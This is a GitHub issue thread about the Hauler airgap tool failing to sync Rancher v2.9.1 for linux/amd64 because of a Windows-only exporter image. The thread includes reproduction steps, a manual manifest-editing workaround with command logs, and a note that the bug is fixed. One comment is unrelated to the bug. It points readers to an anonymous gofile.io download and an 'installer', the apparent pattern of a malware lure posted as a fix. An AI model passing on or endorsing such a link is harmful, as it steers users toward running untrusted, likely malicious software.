### ISSUE TITLE
[BUG] Hauler fails to pull Rancher v2.9.x linux/amd64 due to mirrored-prometheus-windows-exporter

### ISSUE THREAD

**Issue by HoustonDad** [hauler-dev/hauler#315]
**Environmental Info:**
- Linux hauler 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

**Hauler Version:**
```
root@hauler:~# hauler version
 __    __       ___       __    __   __       _______ .______
|  |  |  |     /   \     |  |  |  | |  |     |   ____||   _  \
|  |__|  |    /  ^  \    |  |  |  | |  |     |  |__   |  |_)  |
|   __   |   /  /_\  \   |  |  |  | |  |     |   __|  |      /
|  |  |  |  /  _____  \  |  `--'  | |  `----.|  |____ |  |\  \----.
|__|  |__| /__/     \__\  \______/  |_______||_______|| _| `._____|
hauler: Airgap Swiss Army Knife

GitVersion:    1.0.7
GitCommit:     c592551
GitTreeState:  clean
BuildDate:     2024-08-13T19:23:45Z
GoVersion:     go1.21.12
Compiler:      gc
Platform:      linux/amd64
```

**Describe the Bug:**

- When using the following command from our documentation to pull down Rancher v2.9.x with the platform flag, Hauler fails to pull down mirrored-prometheus-windows-exporter as it's a Windows only image, and doesn't exist for linux/amd64. However, this image is still in the manifests, and Hauler will NOT continue on with the rest of the manifest ( ref: #296 )

**Steps to Reproduce:**
```
hauler store sync --store image-store --products rancher=v2.9.1 --key carbide-key.pub --platform linux/amd64
```

**Expected Behavior:**
- Hauler should NOT try to pull down this image on the linux/amd64 platform

**Actual Behavior:**
- Hauler attempts to pull down this image, and it fails and will NOT pull down the rest of the images.

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/Lji8KD
select the desired compiler in the installer

**Comment by HoustonDad** [comment]
Workaround

Pull the Rancher manifest down directly, edit the manifest to remove the mirrored-prometheus-windows-exporter image and then tell Hauler to pull down that manifest instead of using --product:

``` 
root@hauler:~# hauler store add image rgcrprod.azurecr.us/hauler/rancher-manifest.yaml:v2.9.1
2024-09-04 12:38:07 INF adding 'image' [rgcrprod.azurecr.us/hauler/rancher-manifest.yaml:v2.9.1] to the store
2024-09-04 12:38:10 INF successfully added 'image' [rgcrprod.azurecr.us/hauler/rancher-manifest.yaml:v2.9.1]

root@hauler:~# hauler store extract hauler/rancher-manifest.yaml:v2.9.1
2024-09-04 12:38:14 INF extracted [application/vnd.oci.image.manifest.v1+json] from store with digest [sha256:210331890b376795784b79757a6590cf7f9e7e27d45349182375dc08cf6614de]
2024-09-04 12:38:14 INF extracted [application/vnd.docker.distribution.manifest.v2+json] from store with digest [sha256:c984ec7789cf5e10c06d8b308cf8bda4d0a24ddd84c20f4810132e97ab64f78d]

root@hauler:~# vi rancher-manifest.yaml #REMOVE "- name: rgcrprod.azurecr.us/rancher/mirrored-prometheus-windows-exporter:0.25.1" line

root@hauler:~# hauler store sync --files rancher-manifest.yaml --store image-store --key carbide-key.pub --platform linux/amd64
```

**Comment by dweomer** [comment]
fixed by #317
